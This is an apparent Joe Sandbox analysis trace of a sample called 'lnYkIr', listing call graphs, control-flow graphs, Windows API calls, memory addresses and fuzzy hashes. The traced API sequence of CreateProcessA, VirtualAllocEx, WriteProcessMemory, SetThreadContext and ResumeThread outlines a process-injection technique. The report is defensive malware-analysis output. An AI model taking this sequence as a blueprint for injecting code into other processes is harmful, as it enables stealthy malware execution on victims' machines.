768c247 26155->26157 26157->26074 26159 768c1a8 WriteProcessMemory 26158->26159 26161 768c247 26159->26161 26161->26074 26163 768bf60 ResumeThread 26162->26163 26165 768bfd1 26163->26165 26165->26103 26167 768bfa0 ResumeThread 26166->26167 26169 768bfd1 26167->26169 26169->26103 26171 768c128 VirtualAllocEx 26170->26171 26173 768c165 26171->26173 26173->26120 26175 768c0e8 VirtualAllocEx 26174->26175 26177 768c165 26175->26177 26177->26120 26179 768c2e3 ReadProcessMemory 26178->26179 26181 768c327 26179->26181 26181->26135 26183 768c298 ReadProcessMemory 26182->26183 26185 768c327 26183->26185 26185->26135 26186 176e3a0 DuplicateHandle 26187 176e436 26186->26187 26234 176c0c0 26235 176c102 26234->26235 26236 176c108 GetModuleHandleW 26234->26236 26235->26236 26237 176c135 26236->26237 26188 768fbb0 26191 768fbb3 26188->26191 26189 768fd3b 26191->26189 26192 768d568 26191->26192 26193 768fe30 PostMessageW 26192->26193 26195 768fe9c 26193->26195 26195->26191 26196 176c168 26197 176c17c 26196->26197 26198 176c1a1 26197->26198 26200 176b910 26197->26200 26201 176c348 LoadLibraryExW 26200->26201 26203 176c3c1 26201->26203 26203->26198 26204 1764668 26205 1764674 26204->26205 26207 17647b0 26204->26207 26208 17647d5 26207->26208 26212 17648c0 26208->26212 26216 17648b1 26208->26216 26214 17648e7 26212->26214 26213 17649c4 26213->26213 26214->26213 26220 1764518 26214->26220 26218 17648c0 26216->26218 26217 17649c4 26217->26217 26218->26217 26219 1764518 CreateActCtxA 26218->26219 26219->26217 26221 1765d50 CreateActCtxA 26220->26221 26223 1765e13 26221->26223 26224 176e158 26225 176e19e GetCurrentProcess 26224->26225 26227 176e1f0 GetCurrentThread 26225->26227 26228 176e1e9 26225->26228 26229 176e226 26227->26229 26230 176e22d GetCurrentProcess 26227->26230 26228->26227 26229->26230 26231 176e263 GetCurrentThreadId 26230->26231 26233 176e2bc 26231->26233

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 176e158-176e1e7 GetCurrentProcess 298 176e1f0-176e224 GetCurrentThread 294->298 299 176e1e9-176e1ef 294->299 300 176e226-176e22c 298->300 301 176e22d-176e261 GetCurrentProcess 298->301 299->298 300->301 302 176e263-176e269 301->302 303 176e26a-176e282 301->303 302->303 307 176e28b-176e2ba GetCurrentThreadId 303->307 308 176e2c3-176e325 307->308 309 176e2bc-176e2c2 307->309 309->308
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0176E1D6
                                                              • GetCurrentThread.KERNEL32 ref: 0176E213
                                                              • GetCurrentProcess.KERNEL32 ref: 0176E250
                                                              • GetCurrentThreadId.KERNEL32 ref: 0176E2A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 36408f54deecff0d0046cc7b74a7de95e488ad7362f2fca48e54218881c9dc50
                                                              • Instruction ID: 9c628a6d7714a741e23c8b05d4b4e14cb0d7243a6026247e122ac9f262b5ad39
                                                              • Opcode Fuzzy Hash: 36408f54deecff0d0046cc7b74a7de95e488ad7362f2fca48e54218881c9dc50
                                                              • Instruction Fuzzy Hash: AD5167B49016498FDB14DFAAD548BDEFBF5FF48304F208459D409A7350DB386944CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 405 768c424-768c426 406 768c428-768c42e 405->406 407 768c42f-768c436 405->407 406->407 408 768c437-768c4c5 406->408 407->408 411 768c4fe-768c51e 408->411 412 768c4c7-768c4d1 408->412 419 768c520-768c52a 411->419 420 768c557-768c586 411->420 412->411 413 768c4d3-768c4d5 412->413 414 768c4f8-768c4fb 413->414 415 768c4d7-768c4e1 413->415 414->411 417 768c4e3 415->417 418 768c4e5-768c4f4 415->418 417->418 418->418 421 768c4f6 418->421 419->420 422 768c52c-768c52e 419->422 426 768c588-768c592 420->426 427 768c5bf-768c679 CreateProcessA 420->427 421->414 424 768c530-768c53a 422->424 425 768c551-768c554 422->425 428 768c53c 424->428 429 768c53e-768c54d 424->429 425->420 426->427 431 768c594-768c596 426->431 440 768c67b-768c681 427->440 441 768c682-768c708 427->441 428->429 429->429 430 768c54f 429->430 430->425 432 768c598-768c5a2 431->432 433 768c5b9-768c5bc 431->433 435 768c5a4 432->435 436 768c5a6-768c5b5 432->436 433->427 435->436 436->436 438 768c5b7 436->438 438->433 440->441 451 768c718-768c71c 441->451 452 768c70a-768c70e 441->452 454 768c72c-768c730 451->454 455 768c71e-768c722 451->455 452->451 453 768c710 452->453 453->451 456 768c740-768c744 454->456 457 768c732-768c736 454->457 455->454 458 768c724 455->458 460 768c756-768c75d 456->460 461 768c746-768c74c 456->461 457->456 459 768c738 457->459 458->454 459->456 462 768c75f-768c76e 460->462 463 768c774 460->463 461->460 462->463 465 768c775 463->465 465->465
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0768C666
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1f7947e4eaf31f1ba85c07dc04c8da224d7bc76c9d55a3a1b3171715dd3fb6f5
                                                              • Instruction ID: fd58663e3bfc1a163ffcb4fbd3a145dfd4df4a31bda761654aad5754f02d1f06
                                                              • Opcode Fuzzy Hash: 1f7947e4eaf31f1ba85c07dc04c8da224d7bc76c9d55a3a1b3171715dd3fb6f5
                                                              • Instruction Fuzzy Hash: 3DA14FB1D00219CFDF64DF68C841BEDBBB2BF48314F1486A9D809A7250DB749985CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 466 768c430-768c4c5 469 768c4fe-768c51e 466->469 470 768c4c7-768c4d1 466->470 477 768c520-768c52a 469->477 478 768c557-768c586 469->478 470->469 471 768c4d3-768c4d5 470->471 472 768c4f8-768c4fb 471->472 473 768c4d7-768c4e1 471->473 472->469 475 768c4e3 473->475 476 768c4e5-768c4f4 473->476 475->476 476->476 479 768c4f6 476->479 477->478 480 768c52c-768c52e 477->480 484 768c588-768c592 478->484 485 768c5bf-768c679 CreateProcessA 478->485 479->472 482 768c530-768c53a 480->482 483 768c551-768c554 480->483 486 768c53c 482->486 487 768c53e-768c54d 482->487 483->478 484->485 489 768c594-768c596 484->489 498 768c67b-768c681 485->498 499 768c682-768c708 485->499 486->487 487->487 488 768c54f 487->488 488->483 490 768c598-768c5a2 489->490 491 768c5b9-768c5bc 489->491 493 768c5a4 490->493 494 768c5a6-768c5b5 490->494 491->485 493->494 494->494 496 768c5b7 494->496 496->491 498->499 509 768c718-768c71c 499->509 510 768c70a-768c70e 499->510 512 768c72c-768c730 509->512 513 768c71e-768c722 509->513 510->509 511 768c710 510->511 511->509 514 768c740-768c744 512->514 515 768c732-768c736 512->515 513->512 516 768c724 513->516 518 768c756-768c75d 514->518 519 768c746-768c74c 514->519 515->514 517 768c738 515->517 516->512 517->514 520 768c75f-768c76e 518->520 521 768c774 518->521 519->518 520->521 523 768c775 521->523 523->523
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0768C666
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1b0b8ab951ad268c1d5ea2d7de72b6d2cca9bec86119a46f6c1633889ec5de6c
                                                              • Instruction ID: 64a8c2fc37c6fdf0e6c0cfd6d9b05b2e95e4150c7f431941e1fd8a2d4ef7f89d
                                                              • Opcode Fuzzy Hash: 1b0b8ab951ad268c1d5ea2d7de72b6d2cca9bec86119a46f6c1633889ec5de6c
                                                              • Instruction Fuzzy Hash: DA9140B1D00219CFDF54DF68C841BEDBBB2BF48314F1486A9D809A7254DB749985CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 635 1765d44-1765d4e 636 1765d50-1765e11 CreateActCtxA 635->636 638 1765e13-1765e19 636->638 639 1765e1a-1765e74 636->639 638->639 646 1765e76-1765e79 639->646 647 1765e83-1765e87 639->647 646->647 648 1765e98 647->648 649 1765e89-1765e95 647->649 651 1765e99 648->651 649->648 651->651
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 01765E01
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 867f3c4a4f4b2a33e5d69421e44e9c9de8a284d3131e125b11179fde3330eccc
                                                              • Instruction ID: 0fc878f2157679fec9e0c0d9798927a9812ebe7e532dcea4ead3ae84107ed6b3
                                                              • Opcode Fuzzy Hash: 867f3c4a4f4b2a33e5d69421e44e9c9de8a284d3131e125b11179fde3330eccc
                                                              • Instruction Fuzzy Hash: C341DFB0C00619CFDB24DFA9C884B9EFBB5BF49304F20856AD418AB255DB756946CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 652 1764518-1765e11 CreateActCtxA 655 1765e13-1765e19 652->655 656 1765e1a-1765e74 652->656 655->656 663 1765e76-1765e79 656->663 664 1765e83-1765e87 656->664 663->664 665 1765e98 664->665 666 1765e89-1765e95 664->666 668 1765e99 665->668 666->665 668->668
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 01765E01
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 05938ec8c345290939cf409b104d55cd45432c199f62e054fcd4f1464f387663
                                                              • Instruction ID: 9a27a62e4854ef2c2e8923215db9b6d9b357334c89c19e1afefea3fbe984f693
                                                              • Opcode Fuzzy Hash: 05938ec8c345290939cf409b104d55cd45432c199f62e054fcd4f1464f387663
                                                              • Instruction Fuzzy Hash: CC41DFB0C0061DCFDB24DFA9C844B9EFBB5BF48704F20816AD408AB255DB756945CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 669 768c1a1-768c1f6 672 768c1f8-768c204 669->672 673 768c206-768c245 WriteProcessMemory 669->673 672->673 675 768c24e-768c27e 673->675 676 768c247-768c24d 673->676 676->675
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0768C238
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: ac2493e8bb5063153193d0f225a9c1f9f75db8b5515bd2406c54c5397e5c91af
                                                              • Instruction ID: 1e3075cb590ec5a75a5f17eec21f3f8bb0a8b81381daef1a218d7dc44c1657d9
                                                              • Opcode Fuzzy Hash: ac2493e8bb5063153193d0f225a9c1f9f75db8b5515bd2406c54c5397e5c91af
                                                              • Instruction Fuzzy Hash: B23147B19003499FDB10DFA9C9857EEBFF5FF48310F10842AE919A7240D778A945CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 680 768c1a8-768c1f6 682 768c1f8-768c204 680->682 683 768c206-768c245 WriteProcessMemory 680->683 682->683 685 768c24e-768c27e 683->685 686 768c247-768c24d 683->686 686->685
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0768C238
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: ae26abe4aa5463ac7a39a6379e4ec9fc9a61bf902de789d7580fcc2500ee0cc1
                                                              • Instruction ID: 8ce37ff9fed825b5601d50661385c559012d408263e1a0cc8fa2c8db5fcee39e
                                                              • Opcode Fuzzy Hash: ae26abe4aa5463ac7a39a6379e4ec9fc9a61bf902de789d7580fcc2500ee0cc1
                                                              • Instruction Fuzzy Hash: 59213BB19003099FCB10DFA9C945BDEBBF5FF48310F108429E919A7250D7789944CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 701 768c291-768c325 ReadProcessMemory 705 768c32e-768c35e 701->705 706 768c327-768c32d 701->706 706->705
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0768C318
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 1b8e08d940fa06518c951f260097726478404f8c9a7855e26cb6ffbb6dde7a19
                                                              • Instruction ID: 8a5388278969f08014e35b0b07e6f84c7251a1976a4e21e6bd31bbb82f6e50f3
                                                              • Opcode Fuzzy Hash: 1b8e08d940fa06518c951f260097726478404f8c9a7855e26cb6ffbb6dde7a19
                                                              • Instruction Fuzzy Hash: B0212AB1C003599FCB10DFAAD945AEEFBF5FF48310F50842AE519A7650C738A945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 690 768c008-768c05b 693 768c06b-768c09b Wow64SetThreadContext 690->693 694 768c05d-768c069 690->694 696 768c09d-768c0a3 693->696 697 768c0a4-768c0d4 693->697 694->693 696->697
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0768C08E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: db3b69b00608ff973cc001447d1f6dd4ef3b68a95d7214ef0584adb3166e8c42
                                                              • Instruction ID: 2167e98d72774494a629726e733ca58346768f615ce35a801014a071d84992a9
                                                              • Opcode Fuzzy Hash: db3b69b00608ff973cc001447d1f6dd4ef3b68a95d7214ef0584adb3166e8c42
                                                              • Instruction Fuzzy Hash: 012137B19003099FDB10DFAAC5857AEBFF4EF48324F14842AD559A7240CB79A985CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 720 768c298-768c325 ReadProcessMemory 723 768c32e-768c35e 720->723 724 768c327-768c32d 720->724 724->723
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0768C318
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 9aed151fb110371e27f88348ea7ce27855b9243e13edd44f643ed8f1711e1703
                                                              • Instruction ID: 65706a1e1c1a2ea7c299c6d1c60005b1a5a744da19335111b7e390b2f0080630
                                                              • Opcode Fuzzy Hash: 9aed151fb110371e27f88348ea7ce27855b9243e13edd44f643ed8f1711e1703
                                                              • Instruction Fuzzy Hash: 4B2118B1C003599FCB10DFAAC985AEEFBF5FF48310F50842AE519A7250D778A945DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 710 768c010-768c05b 712 768c06b-768c09b Wow64SetThreadContext 710->712 713 768c05d-768c069 710->713 715 768c09d-768c0a3 712->715 716 768c0a4-768c0d4 712->716 713->712 715->716
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0768C08E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 1409e02399637dc29c529b389562a3b2fd20c0d28ee64fda97a2e32ce3b6c12f
                                                              • Instruction ID: 346e72eadbf1ea6e3fc7cc7b74caccc465345f049e53578d74be6a2e0d42d191
                                                              • Opcode Fuzzy Hash: 1409e02399637dc29c529b389562a3b2fd20c0d28ee64fda97a2e32ce3b6c12f
                                                              • Instruction Fuzzy Hash: 242129B1D003098FDB50DFAAC5857EEBBF5EF48314F148429D519A7240DB79A944CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176E427
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 62f8ac432c57fa58063ea3382fdf2f47620f256e22974a717f1fe37a1283851e
                                                              • Instruction ID: fa118bb69e93e9d5ad71a1e0ebc517829cc676be66a0293f182ee4f295d14581
                                                              • Opcode Fuzzy Hash: 62f8ac432c57fa58063ea3382fdf2f47620f256e22974a717f1fe37a1283851e
                                                              • Instruction Fuzzy Hash: 2221D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D379A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0768C156
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1e7acacc2a6a1d9dbff9732d32238d7bfb39406bcd35d916192d93628eacdb0a
                                                              • Instruction ID: a2d8d2564cafbb4b315b25534cc19eedc2b83f76627f4c7805f0dd3cb0dfefc2
                                                              • Opcode Fuzzy Hash: 1e7acacc2a6a1d9dbff9732d32238d7bfb39406bcd35d916192d93628eacdb0a
                                                              • Instruction Fuzzy Hash: C721DEB18003498FCF10EFAAC845ADFBFF5EF48310F208859D559A7250C7399940CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: d4f507727eecd683e690591f98e560fdfe16ba82918ef112fc2431d57faef93b
                                                              • Instruction ID: 5e7396bfdd2cb8b07481143b2b1e4ba45e44897fe3102da40a397140086b2eec
                                                              • Opcode Fuzzy Hash: d4f507727eecd683e690591f98e560fdfe16ba82918ef112fc2431d57faef93b
                                                              • Instruction Fuzzy Hash: 2E119AB18043498FCB20DFAAC4456AEFFF5EF49320F24885DC559A7240C738A844CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0176C1A1,00000800,00000000,00000000), ref: 0176C3B2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 319527caa2fd04e5647775462c4680ed2f45bcbd8ad4b763b71da6223829420b
                                                              • Instruction ID: c0edb1d5ce4a0661b058368a6acdd5e50e7198e1fab76cc3333f8351ada46659
                                                              • Opcode Fuzzy Hash: 319527caa2fd04e5647775462c4680ed2f45bcbd8ad4b763b71da6223829420b
                                                              • Instruction Fuzzy Hash: DC1126B68003488FDB10DF9AD844ADEFBF8EB48310F10842ED959A7200C379AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0768C156
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 7788bd2e789439e3c1c2f32f208ffa704197c0cfd357327a3616104c71ba55c4
                                                              • Instruction ID: 26dc6f37dc40e417d4ad95273d4b1340d6dce5564dc389ed9326cc72536836fc
                                                              • Opcode Fuzzy Hash: 7788bd2e789439e3c1c2f32f208ffa704197c0cfd357327a3616104c71ba55c4
                                                              • Instruction Fuzzy Hash: FC1149B18002499FCB10DFAAC844AEFBFF5EF48320F108819E519A7250C779A940CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0768FE8D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 25ff9ed79c8ac34ac3628c0e96ec3582e62186c294f26ccb3db5d9082d34d984
                                                              • Instruction ID: 4c470a21af0deb8000eaccedf5f43bfb961f729960e0f054b28f9356e1d6bc7b
                                                              • Opcode Fuzzy Hash: 25ff9ed79c8ac34ac3628c0e96ec3582e62186c294f26ccb3db5d9082d34d984
                                                              • Instruction Fuzzy Hash: E91146B1800249AFDB10DF99D448BEEBFF8EB08314F20855AD514B7201C379A540CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: df83ea39ee7cf406ed0818a9ba87fe3ae03ea880e7633033958491296b9a56e5
                                                              • Instruction ID: 8cbe1971d3b7f0914f51befd3ad1794928523a71adcaf4a380212ae67d5ac2c4
                                                              • Opcode Fuzzy Hash: df83ea39ee7cf406ed0818a9ba87fe3ae03ea880e7633033958491296b9a56e5
                                                              • Instruction Fuzzy Hash: 11113AB1D002498FCB10DFAAD4457AFFBF5EF88324F248819D519A7240CB79A944CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0176C126
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 532df4ec40cde0c1fade373506d39cab0c8fb6a369ee47f5f966a3450a49fe52
                                                              • Instruction ID: 43132fea2a062e2ab75d35389e74074c95574c135114c85897e9032f59ce49d1
                                                              • Opcode Fuzzy Hash: 532df4ec40cde0c1fade373506d39cab0c8fb6a369ee47f5f966a3450a49fe52
                                                              • Instruction Fuzzy Hash: 32110FB6C00249CFDB14DF9AD844A9EFBF8AB89214F10842AD958B7200C379A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0768FE8D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 066fd22ccf9ddabb408fe6bbb23c12ffb604a6ecab60556ee46b21b0a6da93bd
                                                              • Instruction ID: 1cad0cfcd0d9cb734b976209eb21fd4306647a5f54b132c1d76a1478b00c4653
                                                              • Opcode Fuzzy Hash: 066fd22ccf9ddabb408fe6bbb23c12ffb604a6ecab60556ee46b21b0a6da93bd
                                                              • Instruction Fuzzy Hash: 4E1106B58003499FCB10EF99D448BEEBBF8EB48314F10845AE519A7201C375A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e665d3c82c6939412864b6c84743afaa5feb07b965c32ff60daf0c8b6e17412
                                                              • Instruction ID: 5443f14a70203795e1c084d00473eb3f8b9e9ebc3167a57b5062662ec05cfe25
                                                              • Opcode Fuzzy Hash: 7e665d3c82c6939412864b6c84743afaa5feb07b965c32ff60daf0c8b6e17412
                                                              • Instruction Fuzzy Hash: C1B1B170B012089FCB14EFA8D594AAEBBFAAF89300F214569E505EB3A1CB70DD05CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81d6a7b92563b368c2f4856ec86bc00f1d45b7fb465c0122ac99dea71543f5e1
                                                              • Instruction ID: e420c7a0c34e410e3cc206e527bd40483940b418f5ef9faa4629d1c6ddf4b38b
